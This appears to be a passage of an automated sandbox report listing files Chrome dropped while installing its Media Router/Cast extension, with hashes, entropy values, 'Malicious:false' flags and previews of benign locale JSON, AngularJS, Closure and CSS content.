                                                                                                                                                                                                                        Entropy (8bit):5.46630477806648
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:8xyKyprnBTF0cEW5xk0rdBrQBiaiNiw+3KrV6c8TEKdl:8ULrB5yW5C0rHrOiZ5gKrV6uml
                                                                                                                                                                                                                        MD5:C3A40E8433D96D7E766C011D9EC7502B
                                                                                                                                                                                                                        SHA1:EAB7BFAE48B1D29B95A8AE040DE94D3500824EE3
                                                                                                                                                                                                                        SHA-256:BD3D0F8CF100C96415B224011F550082D4516593CBD3631347748B7D6AD5B85A
                                                                                                                                                                                                                        SHA-512:ADAD26422DCA2728BB77760C508C37888013EA4E3B980D9133FE12737B02589ACD302B4096B2BF1B772A28A2103B2E1F7210F4900468B4590B84C7BBC950F1C1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "D.ng h.nh".. },.. "1213957982723875920": {.. "message": "Tr..ng h.p n.o sau ..y m. t. ..ng nh.t m.ng c.a b.n?".. },.. "128276876460319075": {.. "message": "Kh.m ph. thi.t b.".. },.. "1428448869078126731": {.. "message": ".. m..t c.a video".. },.. "1522140683318860351": {.. "message": "K.t n.i kh.ng th.nh c.ng. Vui l.ng th. l.i.".. },.. "1550904064710828958": {.. "message": "M..t m.".. },.. "1636686747687494376": {.. "message": "Ho.n h.o".. },.. "1802762746589457177": {.. "message": ".m l..ng".. },.. "1850397500312020388": {.. "message": "B.n c. th. nh.n th.y Chromecast c.a m.nh trong $START_LINK$.ng d.ng Google Home$END_LINK$ kh.ng? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "conte
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\zh\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):14773
                                                                                                                                                                                                                        Entropy (8bit):5.670562029027517
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:hppr6VVD8/LkiQKrTV2U00jT25kNV6c8TEKdl:hr88/YOrTjF2GV6uml
                                                                                                                                                                                                                        MD5:D4513639FFC58664556B4607BF8A3F19
                                                                                                                                                                                                                        SHA1:65629BC4CBBACA498F4082DD5884C8D3D7DDDC8A
                                                                                                                                                                                                                        SHA-256:C6D49997A9B4FF7FE701EC3644B1A523679A27778FB4BD39B7DBCA9F1ACCE595
                                                                                                                                                                                                                        SHA-512:16260FAC30D57EBFD577833F45D52FEA446ABE877D0D4015EF47C5C9072B81DDA71ED4E5E7DAFDEBE82B26556A4477EA4BFCDEC227058E381B9812DAB1F4379B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "..".. },.. "1213957982723875920": {.. "message": "..................".. },.. "128276876460319075": {.. "message": "....".. },.. "1428448869078126731": {.. "message": ".....".. },.. "1522140683318860351": {.. "message": ".........".. },.. "1550904064710828958": {.. "message": "..".. },.. "1636686747687494376": {.. "message": "..".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "... $START_LINK$Google Home ..$END_LINK$...... Chromecast ..$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START_SPAN": {.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\zh_TW\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):14981
                                                                                                                                                                                                                        Entropy (8bit):5.7019494203747865
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:d2XprmNaHYkOkAFzrlR/jTcGIEaXV6c8TEKdl:WrT4uozrl/sXV6uml
                                                                                                                                                                                                                        MD5:494CE2ACB21A426E051C146E600E7564
                                                                                                                                                                                                                        SHA1:D045ECC2A69C963D5D34A148FE4A7939DE6A1322
                                                                                                                                                                                                                        SHA-256:A1053F9496ED7FA3C625C94347F07A5E760F514FD8EE142EC9EE64E86B9C063D
                                                                                                                                                                                                                        SHA-512:DE2C8498B55749B4D35CF2627E55271F7F09E4560FA16D7094EFB4085CF1E5FAE36F067AAC01AE120548C00DC8AA530EE96079B5CC3E322DF9FF8592799AEB3F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "....".. },.. "1213957982723875920": {.. "message": "................".. },.. "128276876460319075": {.. "message": "....".. },.. "1428448869078126731": {.. "message": ".....".. },.. "1522140683318860351": {.. "message": "...........".. },.. "1550904064710828958": {.. "message": "..".. },.. "1636686747687494376": {.. "message": "..".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": ".... $START_LINK$Google Home ....$END_LINK$...... Chromecast ..$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_metadata\verified_contents.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8873
                                                                                                                                                                                                                        Entropy (8bit):5.791657841286989
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:RbhF22gSNenY4QTm7B9rh/xJvrlib6L5Q6wltsYa:LM9xlv
                                                                                                                                                                                                                        MD5:934A5882214683DEDF130E1C7E513AFD
                                                                                                                                                                                                                        SHA1:4CB84A956148E8F3739681546850996741FDF421
                                                                                                                                                                                                                        SHA-256:D87B0B61750D36CEE2647B59213BAAC8B046C9A929C396CAF36F61AF95939F63
                                                                                                                                                                                                                        SHA-512:C207CED74351BE35DFFD9B1CB991D18B92DEE7093371374FE725C31F541BD680CF04871543D078103D7951E7F3998EBE5F6A91A45A11562055F5E4BD37FC4AF4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: [{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9hbS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZmxYTGNaVTNJSWstTnZiaDlMb0FDQl9lUDc0ODMtUmlkNXliYnQxczBRMCJ9LHsicGF0aCI6Il9sb2NhbGVzL2FyL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ0REo1Y2kwbU53eG5CNmRjQ3Z6cDZRbjZqaGU0cjk5VTRfMmJYVTZsbXZBIn0seyJwYXRoIjoiX2xvY2FsZXMvYmcvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik5FVEw0bjRHWTdGTUVyQnNWVFVpTDFoTERfdGVBRVJOSkVhZk5HT1FUZ0EifSx7InBhdGgiOiJfbG9jYWxlcy9ibi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiWWtEUkRMZktna3h5QXFpNS1YNjN3VWlDYU9DaTJ3ZDg5cHp4dnBmMlR5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiI0OVozYVVUekJxejA3RFFtV2NDMUdGZy1YdW43OXJZOGNJMXRVU1VoNVRNIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6InhaWk1DMlNaT2ZiUl91bHRRWXNtWEdWUGZBaEJfVjNIdHVSeGlQMlhwR0kifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiWlBQdnFIMVBHaFIxZkh6Qzd
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\angular.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):607402
                                                                                                                                                                                                                        Entropy (8bit):5.38463772575273
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:pA7XbYzz3zA/hJNpwsswmlJp49tkhSZWZhPsFv:q7XbYzD8/hJNhshlJp49tkhSZWZhP6
                                                                                                                                                                                                                        MD5:FCE26058E60BD1CF870623C640481A4F
                                                                                                                                                                                                                        SHA1:F95B53ABA83D9F2B1206D79020887D8EF019B737
                                                                                                                                                                                                                        SHA-256:A9B552276ED7342DC92C240F98C68433E7C711436E285A88E0DE9520F3640925
                                                                                                                                                                                                                        SHA-512:51BD481CA8D3A5E21C70A26B69805C62780AFD10476C53FF013D811A6EBA618217D164A03B2C1E5CAC8EFA7E88899C8E14BD53FE452932A13FE8C6E010B9A186
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: //third_party/javascript/angular/v1_6/angular.min.js./*. AngularJS v1.6.4-local+sha.617b36117. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.'use strict';(function(D){'use strict';function te(a){if(G(a))v(a.objectMaxDepth)&&(Uc.objectMaxDepth=ac(a.objectMaxDepth)?a.objectMaxDepth:NaN);else return Uc}function ac(a){return ca(a)&&0<a}function K(a){return function(){var b=arguments[0];var d="["+(a?a+":":"")+b+"] http://errors.angularjs.org/1.6.4-local+sha.617b36117/"+(a?a+"/":"")+b;for(b=1;b<arguments.length;b++){d=d+(1==b?"?":"&")+"p"+(b-1)+"=";var c=encodeURIComponent;var e=arguments[b];e="function"==typeof e?e.toString().replace(/ \{[\s\S]*$/,""):."undefined"==typeof e?"undefined":"string"!=typeof e?JSON.stringify(e):e;d+=c(e)}return Error(d)}}function pa(a){if(null==a||cb(a))return!1;if(J(a)||I(a)||x&&a instanceof x)return!0;var b="length"in Object(a)&&a.length;return ca(b)&&(0<=b&&(b-1 in a||a instanceof Array)||"function"===typeof a.item)}function p(a,b,d){var c;i
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\background_script.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2088
                                                                                                                                                                                                                        Entropy (8bit):5.176623390098955
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:g8MBPC3U7en+enInMtQgQ+AlRRZGz+GhI9OuYMZ8vNI:g84Cme+eokD9G+GOkiO
                                                                                                                                                                                                                        MD5:47D5838CF5DB13E4E7EF71EC5FC940A1
                                                                                                                                                                                                                        SHA1:6AAE6A72DADCD30F0C8D3095E90468996B59ABB7
                                                                                                                                                                                                                        SHA-256:E0F0E47CDFE7C7D6E6BB63A789D7C20B05AB8B3F6ADFDF07D08793437F2CCD42
                                                                                                                                                                                                                        SHA-512:82515B9B3F154C3B3EA18C62137F07DF8933421C096989ABD0CC4F5A4B3AA06411EE097FAC38475ECB386A6094F99EA9D08CE31D409A41E2757733C4FC86B407
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 'use strict';$a("mr.TestProvider");var ay,wx,by=$a("mr.Init"),cy=function(a){void 0!==a.use_views_dialog&&by.info("Using the "+(a.use_views_dialog?"Views (Harmony)":"WebUI")+" dialog.");void 0!==a.enable_cast_sink_query&&by.info("Native Cast MRP is "+(a.enable_cast_sink_query?"disabled":"enabled")+".");void 0!==a.use_mirroring_service&&by.info("Native Mirroring Service is "+(a.use_mirroring_service?"enabled":"disabled")+".")};Dr().init();ay=new ob("MediaRouter.Provider.WakeDuration");wx=new Mx;.var dy=(new Promise(function(a,b){switch(window.location.host){case "enhhojjnijigcajfphajepfemndkmdlo":a();break;case "pkedcjkdefgpdelpbcmbmeomcjbeemfm":chrome.management.get("enhhojjnijigcajfphajepfemndkmdlo",function(c){chrome.runtime.lastError||!c.enabled?a():b(Error("Dev extension is enabled"))});break;default:b(Error("Unknown extension id"))}})).then(function(){return chrome.mojoPrivate&&chrome.mojoPrivate.requireAsync?new Promise(function(a){chrome.mojoPrivate.requireAsync("media_router_bi
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\cast_sender.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50197
                                                                                                                                                                                                                        Entropy (8bit):5.271512845100311
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:SYrnK3OaLzBjUl3YUDNEHruOQVjUR7BELYHppUTnFUbQwTv+4A/SwLGR7gPBJsmL:SYrnKeEzBjUl3YUDNEHruOQVjUR7BELr
                                                                                                                                                                                                                        MD5:BBEA05A7844E45C1CF7B7479506DBB0F
                                                                                                                                                                                                                        SHA1:4E421EE2CE22E9E10D7CD9BBC0F9FD38C71716FA
                                                                                                                                                                                                                        SHA-256:BB77A95786B01BD9D9A0F96B6AEA759E4B4C7CF9275E6B11C819D3BEA867CD8B
                                                                                                                                                                                                                        SHA-512:B5F5AF810545F7EB790A1F63B09C093752585401D60DAAF6545BADD444968D47F46263BA6639531C13B1D6182D4CA0CD0718DC3E399DA620C4FE78262A5135F7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=function(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:aa(a)}},ca="function"==typeof Object.create?Object.create:function(a){var b=function(){};b.prototype=a;return new b},k;.if("function"==typeof Object.setPrototypeOf)k=Object.setPrototypeOf;else{var m;a:{var da={Ub:!0},ea={};try{ea.__proto__=da;m=ea.Ub;break a}catch(a){}m=!1}k=m?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}.var fa=k,n=function(a,b){a.prototype=ca(b.prototype);a.prototype.constructor=a;if(fa)fa(a,b);else for(var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c]},p=this||self,ha=function(){},q=function(a){var
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\common.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):38099
                                                                                                                                                                                                                        Entropy (8bit):5.424217989145786
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:xhQXYr24Z15Ey17Pbgw2N8AsdVyjj4DS/U9DSbjvN:xhQXYrzX17PbD2MdV9DLM5
                                                                                                                                                                                                                        MD5:B6B210313827B63A322E102627320835
                                                                                                                                                                                                                        SHA1:03D4A5DDF7E68F51B73E5C5C1D852D5F50611B8D
                                                                                                                                                                                                                        SHA-256:35AD6DB342342660ECE38A8967145228E1458ADDDE750ED4F1DDE6A17F351A15
                                                                                                                                                                                                                        SHA-512:5C8C3B5895B541DE6484CC8BFB20E55C2548DBB222B5294C849F3165D139F9F958825384C18C7A8C1836E413CCA1D0C6E9B843254DC1FAA78CBAB50E0BCA712F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var k,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),ea=function(a,b){if(b){var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];e in c||(c[e]={});c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.ea("Symbol",function(a){if(a)return a;var b=function(e,f){this.g=e;ba(this,"description",{configurable:!0,writable:!0,value:f})};b.prototype.toString=function(){
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\feedback.css
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3116
                                                                                                                                                                                                                        Entropy (8bit):5.0201551881561635
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:31YB10fXdq14jTAu0mgs0gwa8J8LZmY1181Y5OGib210bGjKL1rT1hJ14DKtKUHo:nfX8udgaw7mL55cSuoKtHHxOA/x0n
                                                                                                                                                                                                                        MD5:D8EE20737329319BFA1ACBB0E6C219A6
                                                                                                                                                                                                                        SHA1:D24118D81990E1316CA809669ECB603724C6E7E2
                                                                                                                                                                                                                        SHA-256:A582FC20DBCAD1918000B690EB8F237EC14E5B836FD7F799C35702D88DBE6862
                                                                                                                                                                                                                        SHA-512:7633682BF161EB1EDE7D62AA9C5E65A727C030DBAA483FEC4F5948C5A5849EFA342A52260097358BF4EF02F07D0464C3356152ABBE4A5C534580960D80594AC9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: :root {. --paper-blue-500: rgb(33, 150, 243);. --paper-blue-500-dark: rgba(33, 150, 243, 0.87);. --paper-blue-500-light: rgba(33, 150, 243, 0.26);.};..body {. font-size: 12px;. height: inherit;.}..#description,.#required-legend {. margin-top: 22px;.}..#description,.#form-buttons,.#required-legend,.#title {. padding: 0 17px;.}...informative {. font-size: 13px;. line-height: 13px;.}..#feedback-confirmation {. width: initial;.}..#feedback-fine-log-warning {. color: rgb(219, 68, 55);. margin: 10px 0;.}..#feedback-type-toggle,..question {. padding: 16px 17px;.}..#form {. -webkit-padding-end: 24px;. -webkit-padding-start: 24px;. background-color: white;. color: rgba(0, 0, 0, 0.87);. box-shadow: 0 1px 4px 0 rgba(0, 0, 0, 0.37);. margin: -100px auto 48px auto;. padding: 34px 17px;. width: 720px;. z-index: 1;.}..#form-buttons {. flex-direction: row;. display: flex;. justify-content: flex-end;. margin-top: 34px;.}..#header {. margin-bottom: 22px;.}..#header-banner {.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\feedback.html
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15606
                                                                                                                                                                                                                        Entropy (8bit):4.340710080778977
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:WGEiiDKFK5N+bVfifi5sdUemfOHT5MGTGhCBo5NmsAOZ0RsAOZYu24kJkcdFXOrO:WGESFKrsitdfGO6nrom6mcCswz4TLn
                                                                                                                                                                                                                        MD5:0EFADA4B2A95CC2D4AE00F794759D763
                                                                                                                                                                                                                        SHA1:FEC3BB7837BE805955601F8C211DC5BE1F16535D
                                                                                                                                                                                                                        SHA-256:8CB99506A2ED9BCC6E1A66E0F218524C91304B3EBFCA113D0FECBB3D80078D0D
                                                                                                                                                                                                                        SHA-512:7ADF9EA446F06C5BFB203CAE8E0CB97E230E7230D9EC7BEAB8B7F76AC8E9B9CF0FC7395C87D90836D7FDCA57E8F80FD9E0091807B3F902A37F67C69144E49616
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: <!DOCTYPE html>.<html ng-app="feedbackApp" ng-controller="FeedbackCtrl". ng-csp xmlns="http://www.w3.org/1999/xhtml" lang="top.language">.<head>. <title>. Chrome Media Router feedback. </title>. <link rel="stylesheet" type="text/css" href="feedback.css">. <link rel="stylesheet" type="text/css" href="material_css_min.css">. <script src="angular.js"></script>. <script type="text/javascript" src="common.js"></script>. <script type="text/javascript" src="feedback_script.js"></script>.</head>.<body>. <div id="header-banner"></div>. <div>. <div id="form">. <div id="header">. <div id="title">. <angular-message key="MEDIA_ROUTER_FEEDBACK_HEADER". desc="Header of the Media Router feedback page.">. Tell us what's happening with Google Cast.. </angular-message>. </div>. <div id="description" class="informative">. <angular-message key="MEDIA_ROUTER_FEEDBACK_FORM_DESCRIPTION". desc="Text to d
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\feedback_script.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):24452
                                                                                                                                                                                                                        Entropy (8bit):5.747175355035489
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:sJN1cE3zd5m39N/MlzxZibygiLKM9ojX/ySoO4AM5AnshEwR0ChiR5xCzYlBbfTj:sJN1cE3zd5m39N/MlzxZibygiLKM9oj1
                                                                                                                                                                                                                        MD5:26F3B1FE17AD7EA58FEB76414A2A9F61
                                                                                                                                                                                                                        SHA1:00460DF77358708E951BCD745B388B49D81B7D30
                                                                                                                                                                                                                        SHA-256:56686B8D4F0A467D52EA03F503B6F8387742E9F8F3A90AD75C11BC9E3FF243D7
                                                                                                                                                                                                                        SHA-512:ED0A78A934AE02B4606919F04B31F7D78E44E4F654DC20107BD214C2B8614A91E47E6ACFCD504EAC95AE3A06238BB04C2417B71075A9D5192E1CF96E3FC6EB5C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 'use strict';/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var sg=function(a,b,c){a.timeOfStartCall=(new Date).getTime();var d=c||w,e=d.document,f=a.nonce||Fa(d);f&&!a.nonce&&(a.nonce=f);if("help"==a.flow){var g=Ha("document.location.href",d);!a.helpCenterContext&&g&&(a.helpCenterContext=g.substring(0,1200));g=!0;if(b&&JSON&&JSON.stringify){var h=JSON.stringify(b);(g=1200>=h.length)&&(a.psdJson=h)}g||(b={invalidPsd:!0})}b=[a,b,c];d.GOOGLE_FEEDBACK_START_ARGUMENTS=b;c=a.serverUri||"//www.google.com/tools/feedback";if(g=d.GOOGLE_FEEDBACK_START)g.apply(d,b);.else{d=c+"/load.js?";for(var m in a)b=a[m],null==b||Na(b)||(d+=encodeURIComponent(m)+"="+encodeURIComponent(b)+"&");a=qg(fg(e),"SCRIPT");f&&a.setAttribute("nonce",f);f=hd(d);te(a,f);e.body.appendChild(a)}};y("userfeedback.api.startFeedback",sg);var tg=function(){this.j=this.h=this.u=this.modelName=this.l=this.g=this.Ac="";this.o=this.m=this.C=!1};var ug=chrome.i18n.getMessage("4163185390680253103"
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\manifest.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2284
                                                                                                                                                                                                                        Entropy (8bit):5.29272048694412
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:QWaLGou01ghZ7CsbCypwQdmv7pee3hZq/1C/ao1XJN8U3:DaLrgCWrdmTplZNx
                                                                                                                                                                                                                        MD5:F76238944C3D189174DD74989CF1C0C6
                                                                                                                                                                                                                        SHA1:85CE141EC8867B699668A5F5A48F404C84FCEB04
                                                                                                                                                                                                                        SHA-256:2EF48A1CF322DE356E8844DD2FD3431E8E7ACD04770649B6507EACA5ABDB53A7
                                                                                                                                                                                                                        SHA-512:330EC2ADC42A8AE653051694954795664EEECDB1A0E0F7A6BC03349C4FD1568BCC81FF2C4A6D826B07BEA7BED26CC27157A1BFAE4B6FC34B3E121DCE0A5CB26D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "background": {.. "persistent": false,.. "scripts": [ "common.js", "mirroring_common.js", "background_script.js" ].. },.. "content_security_policy": "default-src 'self'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; script-src 'self' https://apis.google.com https://feedback.googleusercontent.com https://www.google.com https://www.gstatic.com; child-src https://accounts.google.com https://content.googleapis.com https://www.google.com; connect-src 'self' http://*:* https://*:*; font-src https://fonts.gstatic.com; object-src 'self';",.. "default_locale": "en",.. "description": "Provider for discovery and services for mirroring of Chrome Media Router",.. "externally_connectable": {.. "ids": [ "idmofbkcelhplfjnmmdolenpigiiiecc", "ggedfkijiiammpnbdadhllnehapomdge", "njjegkblellcjnakomndbaloifhcoccg" ].. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDNTWJoPZ9bT32yKxuuVa9LSEYobjPoXCLX3dgsZ9djDrWKNikTECjdRe3/AFXb+v8jkmmtYQPnOgSYn06J/QodDl
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\material_css_min.css
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):322554
                                                                                                                                                                                                                        Entropy (8bit):5.071302554556422
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:5UhKq5pbUqJHPPXLdi6cv+lWUgkgRyrG24CszGR+QAQ4Vy3OSYec3eNk3ksSn+8o:52TFa
                                                                                                                                                                                                                        MD5:76EAA4368ED0E83F45B725727414D0E2
                                                                                                                                                                                                                        SHA1:CB3ABE758DD77E0AC48F9C9D23DB386E9E52E42E
                                                                                                                                                                                                                        SHA-256:3F94B4F2DDAE805F4863FE751B138CB77B24893E3EDE6822E72F0EE4624CD155
                                                                                                                                                                                                                        SHA-512:8835E1B06718C86D8AB690E700AAF61E47B8E3F6E64D943EC7D95CDB293499F47D5CE408440E0D636A62D580781D256C204CC3E10735D27E49B53A236A6A19B8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: /*!. * AngularJS Material Design. * https://github.com/angular/material. * @license MIT. * v1.1.20. */body,html{height:100%;position:relative}body{margin:0;padding:0}[tabindex="-1"]:focus{outline:none}.inset{padding:10px}a.md-no-style,button.md-no-style{font-weight:400;background-color:inherit;text-align:left;border:none;padding:0;margin:0}button,input,select,textarea{vertical-align:baseline}button,html input[type=button],input[type=reset],input[type=submit]{cursor:pointer;-webkit-appearance:button}button[disabled],html input[type=button][disabled],input[type=reset][disabled],input[type=submit][disabled]{cursor:default}textarea{vertical-align:top;overflow:auto}input[type=search]{-webkit-appearance:textfield;box-sizing:content-box;-webkit-box-sizing:content-box}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}input:-webkit-autofill{text-shadow:none}.md-visually-hidden{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\mirroring_cast_streaming.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):36340
                                                                                                                                                                                                                        Entropy (8bit):5.313292965456902
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:goitSTmMgVc2sUU1Ryk/kKNNIOGJfwaXaaFHKYpzKSivkhpnfHDETmoxKIRxVLjK:0+/kv/zOSf1HQmcjc6aJ
                                                                                                                                                                                                                        MD5:3B822402369E38423E0196F38666E4FF
                                                                                                                                                                                                                        SHA1:46003805834146270C8CDD8DD3DC586B96F07962
